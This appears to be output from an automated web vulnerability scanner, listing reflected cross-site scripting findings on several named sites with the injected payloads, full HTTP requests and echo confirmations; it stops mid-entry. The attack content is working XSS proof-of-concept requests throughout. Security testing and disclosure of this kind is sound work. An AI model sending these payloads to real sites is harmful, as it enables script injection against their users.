GET /pub38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6/banner_728_90_random.php HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e was submitted in the REST URL parameter 1. This input was echoed as e99b4<img src=a onerror=alert(1)>8b9ef66b48e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /searche99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e/emailafriend?url=http%3A%2F%2Fkroogy.com HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8 was submitted in the REST URL parameter 2. This input was echoed as 582a0<img src=a onerror=alert(1)>686409d57c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/emailafriend582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8?url=http%3A%2F%2Fkroogy.com HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4 was submitted in the REST URL parameter 2. This input was echoed as d06fa<img src=a onerror=alert(1)>81d5887b4c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6 was submitted in the page parameter. This input was echoed as 8db35<img src=a onerror=alert(1)>223a12c50e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/index.php?page=search/redir8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6&type=news&search=site:xss.cx HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03 was submitted in the REST URL parameter 1. This input was echoed as bef17<img src=a onerror=alert(1)>1a3c051fc03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /searchbef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03/news?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336 was submitted in the REST URL parameter 2. This input was echoed as 4d34d<img src=a onerror=alert(1)>c809307336 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/news4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef was submitted in the REST URL parameter 1. This input was echoed as 7b56e<img src=a onerror=alert(1)>023dea34fef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef/noresults?search=site:xss.cx&type=news HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673 was submitted in the REST URL parameter 2. This input was echoed as bf205<img src=a onerror=alert(1)>b24b05ec673 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/noresultsbf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673?search=site:xss.cx&type=news HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5 was submitted in the REST URL parameter 1. This input was echoed as 898ad<img src=a onerror=alert(1)>372477569b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5/random.php HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 was submitted in the REST URL parameter 2. This input was echoed as be755<img src=a onerror=alert(1)>f0101f7e97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/random.phpbe755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87 was submitted in the REST URL parameter 1. This input was echoed as 47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef was submitted in the REST URL parameter 2. This input was echoed as 24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c was submitted in the REST URL parameter 1. This input was echoed as 34153<img src=a onerror=alert(1)>b5d3aca645c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c/special?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427 was submitted in the REST URL parameter 2. This input was echoed as ae757<img src=a onerror=alert(1)>d4b0d95427 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/specialae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1 was submitted in the REST URL parameter 1. This input was echoed as bf3e5<img src=a onerror=alert(1)>e2f2d6523e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /searchbf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1/videos?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549 was submitted in the REST URL parameter 2. This input was echoed as 9b764<img src=a onerror=alert(1)>cca99ab0549 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299 was submitted in the REST URL parameter 1. This input was echoed as aae05<img src=a onerror=alert(1)>78d7029f299 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /searchaae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299/web?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f was submitted in the REST URL parameter 2. This input was echoed as 15d5b<img src=a onerror=alert(1)>f149c7a1f7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/web15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c3ca</script><script>alert(1)</script>8a921d8d37a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /z/371/CD1/id4+1061634715c3ca</script><script>alert(1)</script>8a921d8d37a HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e01"><script>alert(1)</script>0f82d394dbd was submitted in the REST URL parameter 4. This input was echoed as a2e01\"><script>alert(1)</script>0f82d394dbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /z/371/CD1/id4+106163471a2e01"><script>alert(1)</script>0f82d394dbd HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.42. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pub.retailer-amazon.net
Path:
/banner_120_600_a.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96112"><img src=a onerror=alert(1)>e97eff3a4a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /banner_120_600_a.php?search={$keyw/96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8ord} HTTP/1.1 Host: pub.retailer-amazon.net Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.43. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pub.retailer-amazon.net
Path:
/banner_120_600_a.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6d4b"><img src=a onerror=alert(1)>1a348cd60ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /banner_120_600_a.php?search={$keyw/a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60acord} HTTP/1.1 Host: pub.retailer-amazon.net Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c was submitted in the search parameter. This input was echoed as 29fc5"><img src=a onerror=alert(1)>575b178e83c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /banner_120_600_a.php?search={$keyword}29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c HTTP/1.1 Host: pub.retailer-amazon.net Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 was submitted in the search parameter. This input was echoed as 44577"><img src=a onerror=alert(1)>4b902301784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /banner_120_600_a.php?search=44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 HTTP/1.1 Host: pub.retailer-amazon.net Proxy-Connection: keep-alive Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload e685f<script>alert(1)</script>8d158132c29 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
